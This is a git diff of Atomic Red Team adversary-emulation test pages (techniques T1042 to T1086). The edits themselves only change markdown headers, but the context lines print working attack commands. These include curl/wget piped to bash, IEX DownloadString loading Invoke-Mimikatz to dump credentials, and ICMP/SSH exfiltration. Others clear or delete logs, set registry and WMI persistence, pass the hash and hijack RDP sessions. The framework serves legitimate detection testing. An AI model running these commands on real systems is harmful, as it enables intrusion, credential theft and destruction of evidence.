perform PCAP on. | String | Ethernet0| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe ``` diff --git a/atomics/T1042/T1042.md b/atomics/T1042/T1042.md index 960fe846..6ecbbe9b 100644 --- a/atomics/T1042/T1042.md +++ b/atomics/T1042/T1042.md 
@@ -28,8 +28,7 @@ Change Default File Association From cmd.exe | extension_to_change | File Extension To Hijack | String | .wav| | target_exenstion_handler | Thing To Open | Path | C:\Program Files\Windows Media Player\wmplayer.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" ```
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 53abc0c4..146b6eaf 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -17,8 +17,7 @@ Scan ports to check for listening ports **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; @@ -40,8 +39,7 @@ Scan ports to check for listening ports with Nmap. | port | Ports to scan. | string | 80| | host | Host to scan. | string | 192.168.1.1| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` nmap -sS #{network_range} -p #{port} telnet #{host} #{port} nc -nv #{host} #{port} diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index d94e6c0d..c31acd34 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -23,8 +23,7 @@ WMI List User Accounts **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic useraccount get /ALL ```
@@ -36,8 +35,7 @@ WMI List Processes **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` wmic process get caption,executablepath,commandline ```
@@ -49,8 +47,7 @@ WMI List Software **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` wmic qfe get description,installedOn /format:csv ```
@@ -68,8 +65,7 @@ WMI List Remote Services | node | Ip Address | String | 192.168.0.1| | service_search_string | Name Of Service | String | sql server|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` wmic /node:"#{node}" service where (caption like "%#{service_search_string} (%") ```
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 902d12e8..9e515de1 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -30,8 +30,7 @@ Remote to Local | user_name | username for domain | string | atomic| | password | password for user | string | atomic|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ```
@@ -52,8 +51,7 @@ Local to Remote | user_name | username for domain | string | atomic| | password | password for user | string | atomic|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' ```
@@ -65,8 +63,7 @@ A firewall rule (iptables or firewalld) will be needed to allow exfiltration on **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with these steps!
-1. Victim System Configuration:
+#### Run it with these steps! 1. Victim System Configuration: mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
@@ -96,8 +93,7 @@ Exfiltration of specified file over ICMP protocol. | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent. | String | 1.1.1.1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) } ```
diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md
index 320c6ca0..14f996f3 100644
--- a/atomics/T1049/T1049.md
+++ b/atomics/T1049/T1049.md
@@ -27,8 +27,7 @@ Get a listing of network connections. **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` netstat net use net sessions
@@ -42,8 +41,7 @@ Get a listing of network connections. **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` Get-NetTCPConnection ```
@@ -55,8 +53,7 @@ Get a listing of network connections. **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` netstat who -a ```
diff --git a/atomics/T1050/T1050.md b/atomics/T1050/T1050.md
index c14e323d..48737b6c 100644
--- a/atomics/T1050/T1050.md
+++ b/atomics/T1050/T1050.md
@@ -25,8 +25,7 @@ Installs A Local Service | binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` sc.exe create #{service_name} binPath= #{binary_path} sc.exe start #{service_name} sc.exe stop #{service_name}
@@ -47,8 +46,7 @@ Installs A Local Service via PowerShell | binary_path | Name of the service binary, include path. | Path | C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe| | service_name | Name of the Service | String | AtomicTestService|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" Start-Service -Name "#{service_name}" Stop-Service -Name "#{service_name}"
diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md
index 2128963e..c7e828e2 100644
--- a/atomics/T1053/T1053.md
+++ b/atomics/T1053/T1053.md
@@ -22,8 +22,7 @@ Note: deprecated in Windows 8+ **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` at 13:20 /interactive cmd ```
@@ -40,8 +39,7 @@ at 13:20 /interactive cmd | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} ```
@@ -62,8 +60,7 @@ Create a task on a remote system | user_name | Username DOMAIN\User | String | DOMAIN\user| | password | Password | String | At0micStrong|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} ```
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 84785962..cc1b4048 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -48,8 +48,7 @@ Windows 10 Utility To Inject DLLS | dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll| | process_id | PID of input_arguments | Int | $pid|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` mavinject $pid /INJECTRUNNING #{dll_payload} ```
@@ -67,8 +66,7 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/ | dll_payload | DLL to Inject | Path | T1055.dll| | process_id | PID of input_arguments | Int | $pid|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload} ```
@@ -85,8 +83,7 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter |------|-------------|------|---------------| | path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` echo #{path_to_shared_library} > /etc/ld.so.preload ```
@@ -110,8 +107,7 @@ Excercises Five Techniques |------|-------------|------|---------------| | exe_binary | Output Binary | Path | T1055.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` .\bin\#{exe_binary} ```
diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md
index 7194584c..63326f2d 100644
--- a/atomics/T1056/T1056.md
+++ b/atomics/T1056/T1056.md
@@ -28,8 +28,7 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma |------|-------------|------|---------------| | filepath | Name of the local file, include path. | Path | c:\key.log|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` .\Get-Keystrokes.ps1 -LogPath #{filepath} ```
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md
index 15500c54..2fbca057 100644
--- a/atomics/T1057/T1057.md
+++ b/atomics/T1057/T1057.md
@@ -28,8 +28,7 @@ Utilize ps to identify processes |------|-------------|------|---------------| | output_file | path of output file | path | /tmp/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` ps >> #{output_file} ps aux >> #{output_file} ```
diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md
index 77853262..40c6db1f 100644
--- a/atomics/T1059/T1059.md
+++ b/atomics/T1059/T1059.md
@@ -19,8 +19,7 @@ This will download the specified payload and set a marker file in `/tmp/art-fish **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash" ```
diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index 22e08567..638e038b 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -42,8 +42,7 @@ Run Key Persistence |------|-------------|------|---------------| | command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f ```
@@ -61,8 +60,7 @@ RunOnce Key Persistence |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f ```
@@ -80,8 +78,7 @@ RunOnce Key Persistence via PowerShell |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | powershell.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
@@ -100,8 +97,7 @@ Add Shortcut To Startup via PowerShell |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}" $ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk" $WScriptShell = New-Object -ComObject WScript.Shell
diff --git a/atomics/T1062/T1062.md b/atomics/T1062/T1062.md
index 2ad7a808..c32bc853 100644
--- a/atomics/T1062/T1062.md
+++ b/atomics/T1062/T1062.md
@@ -24,8 +24,7 @@ Create a New-VM | vm_name | Create a new VM. | string | testvm| | file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
index ec6b93b5..1a7bdae2 100644
--- a/atomics/T1063/T1063.md
+++ b/atomics/T1063/T1063.md
@@ -29,8 +29,7 @@ Methods to identify Security Software on an endpoint **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` netsh.exe advfirewall firewall show all profiles tasklist.exe tasklist.exe | findstr /i virus
@@ -47,8 +46,7 @@ Methods to identify Security Software on an endpoint **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` get-process | ?{$_.Description -like "*virus*"} get-process | ?{$_.Description -like "*carbonblack*"} get-process | ?{$_.Description -like "*defender*"}
@@ -63,8 +61,7 @@ Methods to identify Security Software on an endpoint **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService ```
@@ -77,8 +74,7 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` fltmc.exe | findstr.exe 385201 ```
diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md
index 7a363f99..fe2bda2b 100644
--- a/atomics/T1064/T1064.md
+++ b/atomics/T1064/T1064.md
@@ -19,8 +19,7 @@ Creates and executes a simple bash script. **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" chmod +x /tmp/art.sh
diff --git a/atomics/T1065/T1065.md b/atomics/T1065/T1065.md
index 89643389..4fa3d0a2 100644
--- a/atomics/T1065/T1065.md
+++ b/atomics/T1065/T1065.md
@@ -23,8 +23,7 @@ Testing uncommonly used port utilizing PowerShell | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` test-netconnection -ComputerName #{domain} -port #{port} ```
@@ -42,8 +41,7 @@ Testing uncommonly used port utilizing telnet. | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` telnet #{domain} #{port} ```
diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md
index c3914d2a..b07a9673 100644
--- a/atomics/T1069/T1069.md
+++ b/atomics/T1069/T1069.md
@@ -31,8 +31,7 @@ Permission Groups Discovery **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` dscacheutil -q group dscl . -list /Groups groups
@@ -46,8 +45,7 @@ Permission Groups Discovery for Windows **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` net localgroup net group /domain ```
@@ -65,8 +63,7 @@ Permission Groups Discovery utilizing PowerShell |------|-------------|------|---------------| | user | User to identify what groups a user is a member of | string | administrator|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` get-localgroup get-ADPrinicipalGroupMembership #{user} | select name ```
diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md
index b3b14332..4dbc93ea 100644
--- a/atomics/T1070/T1070.md
+++ b/atomics/T1070/T1070.md
@@ -44,8 +44,7 @@ Clear Windows Event Logs |------|-------------|------|---------------| | log_name | Windows Log Name, ex System | String | System|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` wevtutil cl #{log_name} ```
@@ -57,8 +56,7 @@ Manages the update sequence number (USN) change journal, which provides a persis **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` fsutil usn deletejournal /D C: ```
@@ -70,8 +68,7 @@ Delete system and audit logs **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ```
@@ -89,8 +86,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa |------|-------------|------|---------------| | username | Username of mail spool | String | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` echo 0> /var/spool/mail/#{username} ```
@@ -107,8 +103,7 @@ This test overwrites the specified log. This technique was used by threat actor |------|-------------|------|---------------| | log_path | Path of specified log | Path | /var/log/secure|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` echo 0> #{log_path} ```
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index f8dcf6f8..4af8746c 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -31,8 +31,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
@@ -53,8 +52,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` curl -s -A "HttpBrowser/1.0" -m3 #{domain} curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -78,8 +76,7 @@ The intent of this test is to trigger threshold based detection on the number of | query_type | DNS query type | string | TXT| | query_volume | Number of DNS queries to send | integer | 1000|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout} ```
@@ -102,8 +99,7 @@ This behaviour is typical of implants either in an idle state waiting for instru | c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20| | runtime | Time in minutes to run the simulation | integer | 30|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` .\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime} ```
@@ -123,8 +119,7 @@ The simulation involves sending DNS queries that gradually increase in length un | subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte| | query_type | DNS query type | string | TXT|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` .\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} ```
diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index e285a19a..1e80f23f 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -19,8 +19,7 @@ Utilize powershell to download discovery.bat and save to a local file **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log ```
@@ -32,8 +31,7 @@ Utilize curl to download discovery.sh and execute a basic information gathering **Supported Platforms:** Linux, macOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log ```
diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md
index 49c3ee8b..8f4e0705 100644
--- a/atomics/T1075/T1075.md
+++ b/atomics/T1075/T1075.md
@@ -25,8 +25,7 @@ Note: must dump hashes first | domain | domain | string | atomic.local| | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm} ```
diff --git a/atomics/T1076/T1076.md b/atomics/T1076/T1076.md
index eb583189..3af227f1 100644
--- a/atomics/T1076/T1076.md
+++ b/atomics/T1076/T1076.md
@@ -19,8 +19,7 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` query user sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55" net start sesshijack
diff --git a/atomics/T1077/T1077.md b/atomics/T1077/T1077.md
index 4ec1de97..70ff3218 100644
--- a/atomics/T1077/T1077.md
+++ b/atomics/T1077/T1077.md
@@ -29,8 +29,7 @@ Connecting To Remote Shares | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ```
@@ -49,8 +48,7 @@ Map Admin share utilizing PowerShell | computer_name | Target Computer Name | String | Target| | map_name | Mapped Drive Letter | String | g|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name} ```
diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md
index 178e0ad5..1a17db37 100644
--- a/atomics/T1081/T1081.md
+++ b/atomics/T1081/T1081.md
@@ -23,8 +23,7 @@ It is possible to extract passwords from backups or saved virtual machines throu **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` python2 laZagne.py all ```
@@ -41,8 +40,7 @@ Extracting credentials from files |------|-------------|------|---------------| | file_path | Path to search | String | /|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` grep -riP password #{file_path} ```
@@ -54,8 +52,7 @@ Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` invoke-mimikittenz mimikatz.exe ```
@@ -68,8 +65,7 @@ Extracting Credentials from Files **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` findstr /si pass *.xml | *.doc | *.txt | *.xls ls -R | select-string -Pattern password ```
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index de37361f..b979ad10 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -31,8 +31,7 @@ Identify System Info **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ```
@@ -45,8 +44,7 @@ Identify System Info **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` systemsetup system_profiler ls -al /Applications
@@ -60,8 +58,7 @@ Identify System Info **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` uname -a >> /tmp/loot.txt cat /etc/lsb-release >> /tmp/loot.txt cat /etc/redhat-release >> /tmp/loot.txt
@@ -77,8 +74,7 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot **Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` cat /sys/class/dmi/id/bios_version | grep -i amazon cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
@@ -97,8 +93,7 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup **Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` sudo lsmod | grep -i "vboxsf\|vboxguest" sudo lsmod | grep -i "vmw_baloon\|vmxnet" sudo lsmod | grep -i "xen-vbd\|xen-vnif"
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index 9ca89f5c..64081726 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -29,8 +29,7 @@ Find or discover files on the file system **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` dir /s c:\ >> %temp%\download dir /s "c:\Documents and Settings" >> %temp%\download dir /s "c:\Program Files\" >> %temp%\download
@@ -49,8 +48,7 @@ Find or discover files on the file system **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` ls -recurse get-childitem -recurse gci -recurse
@@ -70,8 +68,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` ls -a > allcontents.txt ls -la /Library/Preferences/ > detailedprefsinfo.txt file */* *>> ../files.txt
@@ -89,8 +86,7 @@ Find or discover files on the file system **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt cat /etc/mtab > /tmp/loot.txt find . -type f -iname *.pdf > /tmp/loot.txt
diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md
index bd651fa0..e07b36ed 100644
--- a/atomics/T1084/T1084.md
+++ b/atomics/T1084/T1084.md
@@ -25,8 +25,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL";
@@ -58,8 +57,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index c700033d..3ca3242e 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -24,8 +24,7 @@ Test execution of a remote script using rundll32.exe |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();" ```
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index caa00b85..56dbeb9b 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -50,8 +50,7 @@ Download Mimikatz and dump credentials |------|-------------|------|---------------| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ```
@@ -68,8 +67,7 @@ Download Bloodhound and run it |------|-------------|------|---------------| | bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound" ```
@@ -82,8 +80,7 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
